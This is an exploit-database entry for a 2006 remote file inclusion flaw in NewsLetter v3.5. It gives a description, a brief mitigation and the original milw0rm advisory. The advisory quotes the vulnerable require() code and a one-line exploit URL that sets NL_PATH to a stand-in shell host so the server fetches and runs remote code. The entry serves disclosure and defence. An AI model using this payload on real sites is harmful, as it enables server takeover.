header-logo
Suggest Exploit
vendor:
NewsLetter
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: NewsLetter
Affected Version From: 3.5
Affected Version To: 3.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

NewsLetter v3.5 <= (NL_PATH) Remote File Inclusion Exploit

A vulnerability exists in NewsLetter v3.5, which allows a remote attacker to include a file from a remote host. This is due to a failure in the application to properly sanitize user-supplied input to the 'NL_PATH' parameter in 'index.php'. An attacker can exploit this vulnerability to include arbitrary files from remote hosts, which can lead to the execution of arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files from remote hosts.
Source

Exploit-DB raw data:

#=================================================================
#NewsLetter v3.5 <= (NL_PATH) Remote File Inclusion Exploit
#================================================================
#                                                                |
#Critical Level : Dangerous                                      |
#                                                                |
#Venedor site : http://knusperleicht.at/                         |
#                                                                |
#Version : 3.5                                                   |
#                                                                |
#=================================================================
#Bug in : index.php
#
#Vlu Code :
#--------------------------------
#      /**
# *     Erforderliche Datein einbinden
# */
#
#      require ("$NL_PATH"."inc/config.inc.php");
#      require ("$NL_PATH"."inc/engine.inc.php");
#
#/**
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?NL_PATH=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Bl@Ck^B1rd Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA Kashtawa
#Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer

# milw0rm.com [2006-08-01]